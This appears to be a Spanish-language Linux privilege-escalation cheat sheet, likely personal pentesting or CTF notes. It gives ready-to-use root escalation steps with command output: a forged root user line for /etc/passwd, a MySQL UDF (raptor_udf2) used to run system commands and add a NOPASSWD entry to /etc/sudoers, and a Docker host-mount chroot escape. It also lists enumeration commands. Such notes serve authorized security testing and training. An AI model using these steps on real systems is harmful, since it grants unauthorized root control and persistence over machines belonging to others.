Linux Privilege Escalation

Agregar un usuario con privilegios de root al archivo /etc/passwd

openssl passwd -1 -salt gerh pass123
// El resultado del comando anterior es el hash: $1$gerh$.X4NnMSmCMib61zDEDWTn0

Luego se antepone el nombre de usuario al hash (`spartan:`) y se completa la línea con `:0:0:root:/root:/bin/bash`
spartan:$1$gerh$.X4NnMSmCMib61zDEDWTn0:0:0:root:/root:/bin/bash

su spartan
pass123

Página de referencia sobre el tema de SUID

Se recomienda buscar writeups sobre el binario SUID en cuestión:

Detectar el sistema operativo (distribución de Linux)

cat /etc/*-release
cat /etc/issue

Encontrar directorios en los que puedes alojar información

find . -writable

Técnica utilizando MySQL cuando corre como root

[j0hn@timeclock ~]$ gcc -g -c raptor_udf2.c 
[j0hn@timeclock ~]$ gcc -g -shared -o raptor_udf2.so raptor_udf2.o -lc
[j0hn@timeclock ~]$ ls -la /home/j0hn/raptor_udf2.*
-rw-rw-r-- 1 j0hn j0hn 3314 Feb  7 22:08 /home/j0hn/raptor_udf2.c
-rw-rw-r-- 1 j0hn j0hn 3144 Feb  7 22:08 /home/j0hn/raptor_udf2.o
-rwxrwxr-x 1 j0hn j0hn 6029 Feb  7 22:08 /home/j0hn/raptor_udf2.so


mysql> use mysql;
mysql> create table foo(line blob);
Query OK, 0 rows affected (0.03 sec)

mysql> insert into foo values(load_file('/home/j0hn/raptor_udf2.so'));
Query OK, 1 row affected (0.00 sec)

mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
Query OK, 1 row affected (0.00 sec)

mysql> create function do_system returns integer soname 'raptor_udf2.so';
Query OK, 0 rows affected, 1 warning (0.00 sec)
mysql> select * from mysql.func;
+-----------+-----+----------------+----------+
| name      | ret | dl             | type     |
+-----------+-----+----------------+----------+
| do_system |   2 | raptor_udf2.so | function | 
+-----------+-----+----------------+----------+
1 row in set (0.00 sec)

mysql> select do_system('id > /tmp/out;');
+-----------------------------+
| do_system('id > /tmp/out;') |
+-----------------------------+
|                  4294967296 | 
+-----------------------------+
1 row in set (0.00 sec)

mysql> select do_system('id > /tmp/out; chmod 777 /tmp/out');
+------------------------------------------------+
| do_system('id > /tmp/out; chmod 777 /tmp/out') |
+------------------------------------------------+
|                                     4294967296 | 
+------------------------------------------------+
1 row in set (0.00 sec)

mysql> exit

### Escalación final por medio de /etc/sudoers

[j0hn@timeclock ~]$ mysql -u root 
mysql> select do_system('echo "j0hn ALL =(ALL) NOPASSWD: ALL">> /etc/sudoers');
+------------------------------------------------------------------+
| do_system('echo "j0hn ALL =(ALL) NOPASSWD: ALL">> /etc/sudoers') |
+------------------------------------------------------------------+
|                                                       4294967296 | 
+------------------------------------------------------------------+
1 row in set (0.00 sec)

mysql> exit
Bye
[j0hn@timeclock ~]$ sudo bash
[root@timeclock ~]# cd /root
[root@timeclock root]# ls -la

Escalación vía Docker

docker images ## Obtener el valor de alpine
docker run -it -v /:/mnt alpine chroot /mnt bash

Validación de tareas CRON

Capabilities (CAP)

getcap -r / 2>/dev/null
